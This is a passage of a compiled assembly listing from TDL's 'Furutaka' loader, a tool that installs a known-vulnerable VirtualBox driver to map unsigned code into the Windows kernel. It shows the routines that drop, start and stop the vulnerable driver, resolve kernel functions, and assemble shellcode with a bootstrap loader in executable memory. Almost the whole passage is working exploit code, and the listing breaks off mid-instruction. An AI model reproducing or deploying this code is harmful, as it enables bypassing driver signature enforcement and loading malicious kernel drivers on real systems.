        jmp SHORT $LN4@TDLProcess
$LN3@TDLProcess:
; Line 720
        ; Attribute query failed: message starting "Ldr: Input file".
        lea rcx, OFFSET FLAT:??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
$LN9@TDLProcess:
; Line 723
        xor edx, edx
        call cuiPrintTextW
$LN4@TDLProcess:
        ; Return ebx; rbx is restored from the slot it was saved to in the prologue.
        mov eax, ebx
        mov rbx, QWORD PTR [rsp+592]
        add rsp, 576                                    ; 00000240H
        pop rdi
        ret 0
TDLProcessCommandLine ENDP
_TEXT ENDS
;
; TDLStopVulnerableDriver -- only the opening of this routine is visible here;
; the body continues past this excerpt. The part shown prints a message starting
; "SCM: Unloading " and closes g_hVBox when it is not -1.
;
; Function compile flags: /Ogspy
; COMDAT TDLStopVulnerableDriver
_TEXT SEGMENT
uStr$ = 32
ObjectAttributes$ = 48
TDLStopVulnerableDriver PROC                            ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 623
$LN16:
        mov QWORD PTR [rsp+8], rbx
        mov QWORD PTR [rsp+16], rsi
        push rdi
        sub rsp, 96                                     ; 00000060H
; Line 629
        mov edi, 1
        lea rcx, OFFSET FLAT:??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@
        mov edx, edi
        call cuiPrintTextW
; Line 631
        mov rcx, QWORD PTR g_hVBox
        cmp rcx, -1
        je SHORT $LN2@TDLStopVul
; Line 632
        call QWORD PTR __imp_CloseHandle
$LN2@TDLStopVul:
; Line 634
xor edx, edx xor ecx, ecx mov r8d, 983103 ; 000f003fH call QWORD PTR __imp_OpenSCManagerW ; Line 639 xor esi, esi mov rbx, rax test rax, rax jne SHORT $LN3@TDLStopVul ; Line 640 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ call cuiPrintTextW ; Line 641 jmp $LN1@TDLStopVul $LN3@TDLStopVul: ; Line 645 lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rcx, rbx call scmStopDriver test eax, eax lea r8, OFFSET FLAT:??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ lea rcx, OFFSET FLAT:??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; Line 650 mov edx, edi cmove rcx, r8 call cuiPrintTextW ; Line 653 cmp DWORD PTR g_VBoxInstalled, esi jne $LN6@TDLStopVul ; Line 655 lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rcx, rbx call scmRemoveDriver lea rdx, OFFSET FLAT:??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ test eax, eax lea rcx, OFFSET FLAT:??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ cmove rcx, rdx ; Line 660 mov edx, edi call cuiPrintTextW ; Line 665 lea rdx, OFFSET FLAT:??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ mov QWORD PTR uStr$[rsp+8], rsi lea rcx, QWORD PTR uStr$[rsp] mov DWORD PTR uStr$[rsp], esi call QWORD PTR __imp_RtlInitUnicodeString ; Line 666 lea rax, QWORD PTR uStr$[rsp] mov DWORD PTR ObjectAttributes$[rsp], 48 ; 00000030H xorps xmm0, xmm0 mov QWORD PTR ObjectAttributes$[rsp+16], rax ; Line 667 lea rcx, QWORD PTR ObjectAttributes$[rsp] mov QWORD PTR ObjectAttributes$[rsp+8], rsi movdqu XMMWORD PTR ObjectAttributes$[rsp+32], xmm0 mov DWORD PTR ObjectAttributes$[rsp+24], 64 ; 00000040H call QWORD PTR __imp_NtDeleteFile test eax, eax lea rcx, 
OFFSET FLAT:??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ lea rdx, OFFSET FLAT:??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ cmovs rcx, rdx ; Line 674 jmp SHORT $LN12@TDLStopVul $LN6@TDLStopVul: ; Line 677 mov ecx, edi call supBackupVBoxDrv test eax, eax lea rcx, OFFSET FLAT:??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ lea rdx, OFFSET FLAT:??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ cmove rcx, rdx $LN12@TDLStopVul: ; Line 684 mov edx, edi call cuiPrintTextW mov rcx, rbx call QWORD PTR __imp_CloseServiceHandle $LN1@TDLStopVul: ; Line 685 mov rbx, QWORD PTR [rsp+112] mov rsi, QWORD PTR [rsp+120] add rsp, 96 ; 00000060H pop rdi ret 0 TDLStopVulnerableDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLStartVulnerableDriver _TEXT SEGMENT szDriverFileName$ = 48 DataSize$ = 1120 hDevice$ = 1128 TDLStartVulnerableDriver PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 501 $LN28: mov QWORD PTR [rsp+24], rbx mov QWORD PTR [rsp+32], rsi push rbp push rdi push r15 lea rbp, QWORD PTR [rsp-832] sub rsp, 1088 ; 00000440H ; Line 510 mov rdx, QWORD PTR g_hInstance lea r8, QWORD PTR DataSize$[rbp-256] and DWORD PTR DataSize$[rbp-256], 0 or rdi, -1 mov QWORD PTR hDevice$[rbp-256], rdi xor ebx, ebx lea r15d, QWORD PTR [rdi+2] mov ecx, r15d call supQueryResourceData mov rsi, rax ; Line 511 test rax, rax jne SHORT $LN4@TDLStartVu ; Line 512 mov rax, rdi jmp $LN1@TDLStartVu $LN4@TDLStartVu: ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax lea rdi, QWORD PTR szDriverFileName$[rsp] mov ecx, 1040 ; 00000410H ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 518 mov edx, 260 ; 00000104H ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 
20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 518 lea rcx, QWORD PTR szDriverFileName$[rsp] call QWORD PTR __imp_GetSystemDirectoryW test eax, eax jne SHORT $LN6@TDLStartVu ; Line 519 lea rcx, OFFSET FLAT:??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; Line 520 jmp $LN3@TDLStartVu $LN6@TDLStartVu: ; Line 523 xor edx, edx xor ecx, ecx mov r8d, 983103 ; 000f003fH call QWORD PTR __imp_OpenSCManagerW mov rbx, rax ; Line 524 test rax, rax jne SHORT $LN7@TDLStartVu ; Line 525 lea rcx, OFFSET FLAT:??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; Line 526 jmp $LN3@TDLStartVu $LN7@TDLStartVu: ; Line 532 lea rdi, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rdx, rdi lea rcx, OFFSET FLAT:??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ call supIsObjectExists test al, al je $LN12@TDLStartVu ; Line 534 mov edx, r15d lea rcx, OFFSET FLAT:??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ call cuiPrintTextW ; Line 536 lea rdx, OFFSET FLAT:??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN9@TDLStartVu ; Line 537 lea rcx, OFFSET FLAT:??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 538 jmp $LN3@TDLStartVu $LN9@TDLStartVu: ; Line 541 lea rdx, OFFSET FLAT:??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN10@TDLStartVu ; Line 542 lea rcx, OFFSET FLAT:??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 543 jmp $LN3@TDLStartVu $LN10@TDLStartVu: ; Line 546 lea rdx, OFFSET FLAT:??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ mov rcx, rbx call supStopVBoxService test al, al jne 
SHORT $LN11@TDLStartVu ; Line 547 lea rcx, OFFSET FLAT:??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 548 jmp $LN3@TDLStartVu $LN11@TDLStartVu: ; Line 551 mov ecx, 1000 ; 000003e8H call QWORD PTR __imp_Sleep ; Line 553 mov rdx, rdi mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN12@TDLStartVu ; Line 554 lea rcx, OFFSET FLAT:??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 555 jmp $LN3@TDLStartVu $LN12@TDLStartVu: ; Line 564 cmp DWORD PTR g_VBoxInstalled, 0 je SHORT $LN15@TDLStartVu ; Line 565 xor ecx, ecx call supBackupVBoxDrv ; Line 566 lea rcx, OFFSET FLAT:??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ mov edx, r15d test eax, eax je SHORT $LN26@TDLStartVu ; Line 569 lea rcx, OFFSET FLAT:??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ $LN26@TDLStartVu: ; Line 574 call cuiPrintTextW $LN15@TDLStartVu: lea rdx, OFFSET FLAT:??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ lea rcx, QWORD PTR szDriverFileName$[rsp] call _strcat_w ; Line 575 mov r8d, DWORD PTR DataSize$[rbp-256] lea rcx, QWORD PTR szDriverFileName$[rsp] and DWORD PTR [rsp+32], 0 xor r9d, r9d mov rdx, rsi call supWriteBufferToFile ; Line 578 cmp eax, DWORD PTR DataSize$[rbp-256] je SHORT $LN16@TDLStartVu ; Line 579 lea rcx, OFFSET FLAT:??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; Line 580 jmp SHORT $LN3@TDLStartVu $LN16@TDLStartVu: ; Line 584 cmp DWORD PTR g_VBoxInstalled, 0 jne SHORT $LN17@TDLStartVu ; Line 585 lea r8, QWORD PTR szDriverFileName$[rsp] mov rdx, rdi mov rcx, rbx call scmInstallDriver $LN17@TDLStartVu: ; Line 589 mov rdx, rdi mov rcx, rbx call scmStartDriver test eax, eax je SHORT $LN18@TDLStartVu ; Line 591 lea rdx, QWORD PTR hDevice$[rbp-256] mov rcx, rdi 
call scmOpenDevice test eax, eax lea rcx, OFFSET FLAT:??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ lea rdx, OFFSET FLAT:??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ cmove rcx, rdx ; Line 596 jmp SHORT $LN3@TDLStartVu $LN18@TDLStartVu: ; Line 598 lea rcx, OFFSET FLAT:??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ $LN3@TDLStartVu: ; Line 606 mov edx, r15d call cuiPrintTextW test rbx, rbx je SHORT $LN22@TDLStartVu ; Line 607 mov rcx, rbx call QWORD PTR __imp_CloseServiceHandle $LN22@TDLStartVu: ; Line 609 mov rax, QWORD PTR hDevice$[rbp-256] $LN1@TDLStartVu: ; Line 610 lea r11, QWORD PTR [rsp+1088] mov rbx, QWORD PTR [r11+48] mov rsi, QWORD PTR [r11+56] mov rsp, r11 pop r15 pop rdi pop rbp ret 0 TDLStartVulnerableDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLMapDriver _TEXT SEGMENT Image$ = 48 xExAllocatePoolWithTag$ = 56 xPsCreateSystemThread$ = 64 xZwClose$ = 72 memIO$ = 80 routineName$ = 88 uStr$ = 104 text$ = 128 lpDriverFullName$ = 704 DllCharacteristics$ = 712 Buffer$ = 720 KernelImage$ = 728 TDLMapDriver PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 323 $LN35: mov QWORD PTR [rsp+8], rbx push rbp push rsi push rdi push r12 push r13 push r14 push r15 lea rbp, QWORD PTR [rsp-384] sub rsp, 640 ; 00000280H ; Line 328 xor r13d, r13d mov esi, 2 mov DWORD PTR DllCharacteristics$[rbp-256], esi mov r14, rcx mov QWORD PTR KernelImage$[rbp-256], r13 or r15d, -1 ; ffffffffH ; Line 329 mov QWORD PTR xExAllocatePoolWithTag$[rsp], r13 mov QWORD PTR xPsCreateSystemThread$[rsp], r13 mov QWORD PTR xZwClose$[rsp], r13 ; Line 330 mov QWORD PTR Image$[rsp], r13 ; Line 332 mov QWORD PTR Buffer$[rbp-256], r13 ; Line 338 call supGetNtOsBase mov rbx, rax ; Line 339 test rax, rax je $LN3@TDLMapDriv ; Line 341 lea rdx, OFFSET 
FLAT:??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 342 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov rcx, rbx call u64tohex_w ; Line 343 lea r12d, QWORD PTR [rsi-1] mov edx, r12d lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax lea ecx, QWORD PTR [rsi+14] lea rdi, QWORD PTR uStr$[rsp] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 346 mov rdx, r14 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 346 lea rcx, QWORD PTR uStr$[rsp] call QWORD PTR __imp_RtlInitUnicodeString ; Line 347 lea r9, QWORD PTR Image$[rsp] xor ecx, ecx lea r8, QWORD PTR uStr$[rsp] lea rdx, QWORD PTR DllCharacteristics$[rbp-256] call QWORD PTR __imp_LdrLoadDll ; Line 348 test eax, eax js $LN6@TDLMapDriv cmp QWORD PTR Image$[rsp], r13 je $LN6@TDLMapDriv ; Line 353 lea rdx, OFFSET FLAT:??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 354 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR Image$[rsp] mov rdx, rax call u64tohex_w ; Line 355 mov edx, r12d lea rcx, QWORD PTR text$[rbp-256] mov edi, r12d call cuiPrintTextW ; Line 358 mov rcx, QWORD PTR Image$[rsp] call QWORD PTR __imp_RtlImageNtHeader ; Line 359 test rax, rax je $LN3@TDLMapDriv ; Line 362 mov r12d, DWORD PTR [rax+80] ; Line 364 lea rcx, OFFSET FLAT:??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ mov edx, edi call cuiPrintTextW ; Line 366 lea rdx, OFFSET FLAT:??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ lea rcx, QWORD PTR uStr$[rsp] call QWORD PTR 
__imp_RtlInitUnicodeString ; Line 367 lea r9, QWORD PTR KernelImage$[rbp-256] xor edx, edx lea r8, QWORD PTR uStr$[rsp] xor ecx, ecx call QWORD PTR __imp_LdrLoadDll ; Line 368 test eax, eax js $LN10@TDLMapDriv cmp QWORD PTR KernelImage$[rbp-256], r13 je $LN10@TDLMapDriv ; Line 373 lea rdx, OFFSET FLAT:??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 374 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR KernelImage$[rbp-256] mov rdx, rax call u64tohex_w ; Line 375 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 378 lea rdx, OFFSET FLAT:??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 379 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xExAllocatePoolWithTag$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 380 test eax, eax js $LN13@TDLMapDriv cmp QWORD PTR xExAllocatePoolWithTag$[rsp], r13 je $LN13@TDLMapDriv ; Line 385 lea rdx, OFFSET FLAT:??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 386 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp] call u64tohex_w ; Line 387 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 390 mov r14d, 15063 ; 00003ad7H cmp DWORD PTR g_NtBuildNumber, r14d jae $LN19@TDLMapDriv ; Line 391 lea rdx, OFFSET FLAT:??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 392 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xPsCreateSystemThread$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 
393 test eax, eax js $LN17@TDLMapDriv cmp QWORD PTR xPsCreateSystemThread$[rsp], r13 je $LN17@TDLMapDriv ; Line 398 lea rdx, OFFSET FLAT:??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 399 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xPsCreateSystemThread$[rsp] call u64tohex_w ; Line 400 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 403 lea rdx, OFFSET FLAT:??_C@_07IPICGNAN@ZwClose@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 404 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xZwClose$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 405 test eax, eax js $LN20@TDLMapDriv cmp QWORD PTR xZwClose$[rsp], r13 je $LN20@TDLMapDriv ; Line 410 lea rdx, OFFSET FLAT:??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 411 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xZwClose$[rsp] call u64tohex_w ; Line 412 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW $LN19@TDLMapDriv: ; Line 416 lea rax, QWORD PTR [r12+4096] ; Line 417 mov DWORD PTR [rsp+40], 64 ; 00000040H lea r9, QWORD PTR memIO$[rsp] mov QWORD PTR memIO$[rsp], rax xor r8d, r8d mov DWORD PTR [rsp+32], 12288 ; 00003000H lea rdx, QWORD PTR Buffer$[rbp-256] or rcx, -1 call QWORD PTR __imp_NtAllocateVirtualMemory ; Line 419 cmp QWORD PTR Buffer$[rbp-256], r13 jne SHORT $LN21@TDLMapDriv ; Line 420 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; Line 421 jmp $LN33@TDLMapDriv $LN20@TDLMapDriv: ; Line 406 mov edx, 
edi lea rcx, OFFSET FLAT:??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; Line 407 jmp $LN33@TDLMapDriv $LN17@TDLMapDriv: ; Line 394 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; Line 395 jmp $LN33@TDLMapDriv $LN21@TDLMapDriv: ; Line 424 lea rdx, OFFSET FLAT:??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 425 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR Buffer$[rbp-256] mov rdx, rax call u64tohex_w ; Line 426 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 433 mov rax, QWORD PTR Buffer$[rbp-256] ; Line 435 mov rcx, rbx mov BYTE PTR [rax], 72 ; 00000048H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+1], 185 ; 000000b9H sub rcx, QWORD PTR KernelImage$[rbp-256] mov rax, QWORD PTR Buffer$[rbp-256] add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp] mov QWORD PTR [rax+2], rcx ; Line 438 mov eax, DWORD PTR g_NtBuildNumber cmp eax, r14d jae SHORT $LN23@TDLMapDriv ; Line 439 mov rax, QWORD PTR Buffer$[rbp-256] ; Line 441 mov rcx, rbx ; Line 448 mov r14d, 798 ; 0000031eH mov BYTE PTR [rax+10], 72 ; 00000048H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+11], 186 ; 000000baH sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xPsCreateSystemThread$[rsp] mov rax, QWORD PTR Buffer$[rbp-256] mov QWORD PTR [rax+12], rcx mov rcx, rbx mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+20], 73 ; 00000049H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+21], 184 ; 000000b8H sub rcx, QWORD PTR KernelImage$[rbp-256] mov rax, QWORD PTR Buffer$[rbp-256] add rcx, QWORD PTR xZwClose$[rsp] mov QWORD PTR [rax+22], rcx mov ecx, 30 ; Line 449 mov eax, DWORD PTR g_NtBuildNumber jmp SHORT $LN24@TDLMapDriv $LN23@TDLMapDriv: ; Line 451 mov ecx, 10 mov r14d, 778 ; 0000030aH 
$LN24@TDLMapDriv: ; Line 456 add rcx, QWORD PTR Buffer$[rbp-256] mov edx, 128 ; 00000080H cmp eax, 15063 ; 00003ad7H jae $LN25@TDLMapDriv ; Line 457 lea rax, OFFSET FLAT:TDLBootstrapLoader_code lea edi, QWORD PTR [rdx-125] $LL32@TDLMapDriv: movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 movups xmm0, XMMWORD PTR [rax+96] movups XMMWORD PTR [rcx+96], xmm0 add rcx, rdx movups xmm1, XMMWORD PTR [rax+112] add rax, rdx movups XMMWORD PTR [rcx-16], xmm1 sub rdi, 1 jne SHORT $LL32@TDLMapDriv movups xmm0, XMMWORD PTR [rax] ; Line 460 mov edi, 1 movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 lea rcx, OFFSET FLAT:??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ jmp SHORT $LN26@TDLMapDriv $LN25@TDLMapDriv: ; Line 462 lea rax, OFFSET FLAT:TDLBootstrapLoader_code_w10rs2 $LL31@TDLMapDriv: movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 movups xmm0, 